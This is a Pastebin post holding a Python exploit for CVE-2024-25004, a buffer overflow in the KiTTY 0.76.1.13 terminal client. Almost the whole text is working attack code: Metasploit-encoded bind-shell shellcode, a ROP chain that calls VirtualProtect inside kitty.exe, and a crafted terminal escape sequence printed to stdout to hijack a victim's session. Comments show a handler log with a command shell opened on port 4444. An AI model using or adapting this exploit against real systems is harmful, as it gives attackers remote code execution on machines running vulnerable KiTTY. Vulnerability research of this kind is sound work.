Advertisement
FlyFar

KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow - CVE-2024-25004

Mar 14th, 2024
916
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.68 KB | Cybersecurity | 0 0
  1. # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
  2. # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
  3. # Vendor Homepage: https://github.com/cyd01/KiTTY/=
  4. # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
  5. # Version: ≤ 0.76.1.13
  6. # Tested on: Microsoft Windows 11/10/8/7/XP
  7. # CVE: CVE-2024-25004
  8. #-------------------------------------------------------------------------------------#
  9. # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
  10. #-------------------------------------------------------------------------------------#
  11. # msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
  12. # [*] Payload Handler Started as Job 1                                                #
  13. # msf6 payload(windows/shell_bind_tcp) >                                              #
  14. # [*] Started bind TCP handler against 192.168.100.28:4444                            #
  15. # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444)   #
  16. #-------------------------------------------------------------------------------------#
  17.  
  18. import sys
  19. import os
  20. import struct
  21.  
  22. #-------------------------------------------------------------------------------------#
  23. # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
  24. # windows/shell_bind_tcp - 355 bytes                                                  #
  25. # https://metasploit.com/                                                             #
  26. # Encoder: x86/shikata_ga_nai                                                         #
  27. # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                    #
  28. # PrependMigrate=false, EXITFUNC=process, CreateSession=true,                         #
  29. # AutoVerifySession=true                                                              #
  30. #-------------------------------------------------------------------------------------#
  31.  
  32. buf =  b""
  33. buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
  34. buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
  35. buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
  36. buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
  37. buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
  38. buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
  39. buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
  40. buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
  41. buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
  42. buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
  43. buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
  44. buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
  45. buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
  46. buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
  47. buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
  48. buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
  49. buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
  50. buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
  51. buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
  52. buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
  53. buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
  54. buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
  55. buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
  56. buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
  57. buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
  58. buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
  59. buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
  60. buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e"
  61. buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c"
  62. buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"
  63.  
  64.  
  65. def shellcode():
  66.     sc = b''
  67.     sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
  68.     sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
  69.     sc += b'\x29\xD8'             # sub    eax,ebx
  70.     sc += b'\x29\xC4'             # sub    esp,eax
  71.     sc += buf
  72.     sc += b'\x90' * (1042-len(sc))
  73.     assert len(sc) == 1042
  74.     return sc
  75.  
  76.  
  77. def create_rop_chain():
  78.     # rop chain generated with mona.py - www.corelan.be
  79.     rop_gadgets = [
  80.     #[---INFO:gadgets_to_set_esi:---]
  81.     0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
  82.     0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
  83.     0x41414141,  # Filler (compensate)
  84.     0x41414141,  # Filler (compensate)
  85.     0x41414141,  # Filler (compensate)
  86.     0x41414141,  # Filler (compensate)
  87.     0x41414141,  # Filler (compensate)
  88.     0x41414141,  # Filler (compensate)
  89.     0x41414141,  # Filler (compensate)
  90.     0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
  91.     0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
  92.     #[---INFO:gadgets_to_set_ebp:---]
  93.     0x00429953,  # POP EBP # RETN [kitty.exe]
  94.     0x005405b0,  # PUSH ESP; RETN 0 [kitty.exe]
  95.     #[---INFO:gadgets_to_set_ebx:---]
  96.     0x0049d9f9,  # POP EBX # RETN [kitty.exe]
  97.     0x00000201,  # 0x00000201-> ebx
  98.     #[---INFO:gadgets_to_set_edx:---]
  99.     0x00430dce,  # POP EDX # RETN [kitty.exe]
  100.     0x00000040,  # 0x00000040-> edx
  101.     #[---INFO:gadgets_to_set_ecx:---]
  102.     0x005ac58c,  # POP ECX # RETN [kitty.exe]
  103.     0x004d81d9,  # &Writable location [kitty.exe]
  104.     #[---INFO:gadgets_to_set_edi:---]
  105.     0x004fa404,  # POP EDI # RETN [kitty.exe]
  106.     0x005a2001,  # RETN (ROP NOP) [kitty.exe]
  107.     #[---INFO:gadgets_to_set_eax:---]
  108.     0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
  109.     0x90909090,  # nop
  110.     0x41414141,  # Filler (compensate)
  111.     #[---INFO:pushad:---]
  112.     0x005dfbac,  # PUSHAD # RETN [kitty.exe]
  113.     ]
  114.     return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
  115.  
  116. rop_chain = create_rop_chain()
  117.  
  118.  
  119. #----------------------------------------------------------------------------------#
  120. # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d                                           #
  121. # Return Address Information: 0x00529720 : {pivot 324 / 0x144} :                   #
  122. #   ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
  123. #   ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}                      #
  124. # Shellcode size at ESP: 1042 bytes                                                #
  125. #----------------------------------------------------------------------------------#
  126.  
  127. return_address = struct.pack('<I',  0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull {PAGE_EXECUTE_READWRITE}
  128.  
  129. rop_chain_padding = b'\x90' * 27
  130. nops = b'\x90' * 88
  131.  
  132. escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address
  133. escape_sequence += rop_chain_padding + rop_chain
  134. escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471
  135. escape_sequence += nops + b'\007'
  136.  
  137. stdout = os.fdopen(sys.stdout.fileno(), 'wb')
  138. stdout.write(escape_sequence)
  139. stdout.flush()
  140.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement